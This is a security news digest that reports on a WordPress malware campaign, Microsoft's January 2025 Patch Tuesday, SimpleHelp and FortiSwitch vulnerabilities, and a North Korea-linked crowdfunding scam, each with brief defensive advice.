A fresh wave of malware has overtaken over 5,000 WordPress sites, exploiting rogue admin accounts and malicious plugins to siphon sensitive data. With data being funneled to the wp3[.]xyz domain, researchers urge website owners to bolster defenses by blocking this domain.

Microsoft’s January 2025 Patch Tuesday brings critical relief with fixes for 159 vulnerabilities, including eight zero-days, three actively exploited. Key patches target SYSTEM-level exploits in Hyper-V and resolve dangerous RCE flaws in Microsoft Access, underscoring the need for immediate updates to prevent potential threats.

North Korea's economic tactics continue to evolve, as researchers connected the regime's fake IT worker operations to a crowdfunding scam under the alias Nickle Tapestry. The scam lured victims via IndieGoGo, collecting $20,000 under false promises of innovative wireless memory devices.

Top Malware Reported in the Last 24 Hours

Malware campaign compromises WordPress sites

A new malware campaign targeting WordPress sites has compromised over 5,000 websites. The attackers create rogue admin accounts, install a malicious plugin, and steal sensitive data. The malicious activity uses the wp3[.]xyz domain to exfiltrate data, and researchers have not yet determined the initial infection vector. Website owners are advised to block the wp3[.]xyz domain, review privileged accounts and installed plugins, and strengthen CSRF protections and implement MFA to enhance security.

Top Vulnerabilities Reported in the Last 24 Hours

Microsoft January 2025 Patch Tuesday

Microsoft's January 2025 Patch Tuesday addressed 159 security flaws, including eight zero-day vulnerabilities, three of which are being actively exploited in attacks. The breakdown of vulnerabilities is: 40 elevation of privilege vulnerabilities, 14 security feature bypass vulnerabilities, 58 remote code execution vulnerabilities, 24 information disclosure vulnerabilities, 20 denial of service vulnerabilities, and 5 spoofing vulnerabilities. Microsoft has fixed three actively exploited zero-day vulnerabilities in Windows Hyper-V, which allowed attackers to gain SYSTEM privileges. Additionally, three remote code execution vulnerabilities in Microsoft Access have been resolved. 

SimpleHelp bugs enable file theft and more

Multiple security flaws have been found in SimpleHelp remote access software, which could lead to information disclosure, privilege escalation, and remote code execution. These flaws are tracked as CVE-2024-57727, CVE-2024-57728, and CVE-2024-57726 and have been patched in SimpleHelp versions 5.3.9, 5.4.10, and 5.5.8. Users are advised to apply the patches quickly, change administrator passwords, rotate technician account passwords, and restrict IP addresses for logins. 

Patch this critical FortiSwitch flaw

Fortinet has identified a critical security vulnerability (CVE-2023-37936, CVSS 9.6) in its FortiSwitch product line, which could allow remote, unauthenticated attackers to execute arbitrary code and compromise networks. The vulnerability is due to a hardcoded cryptographic key in affected versions. Fortinet has released patches for all supported versions and urges users to update their devices to specific versions or later. FortiSwitch 6.0 has reached its end-of-life, and users are advised to migrate to a fixed release.

Top Scams Reported in the Last 24 Hours

Fake IT workers scheme and fraudulent crowdfunding

Research by Secureworks found connections between North Korea's fake IT worker scheme and a crowdfunding scam. The group involved in the scam is identified as Nickle Tapestry, which operates several activities for North Korean interests. The crowdfunding scam collected about $20,000 and represents an earlier instance of North Korean actors trying out different money-making schemes before using fake IT workers. Nickle Tapestry was linked to an IndieGoGo crowdfunding page that promoted a Kratos portable wireless memory device; however, buyers reported that the campaign was a scam, with no products or refunds delivered.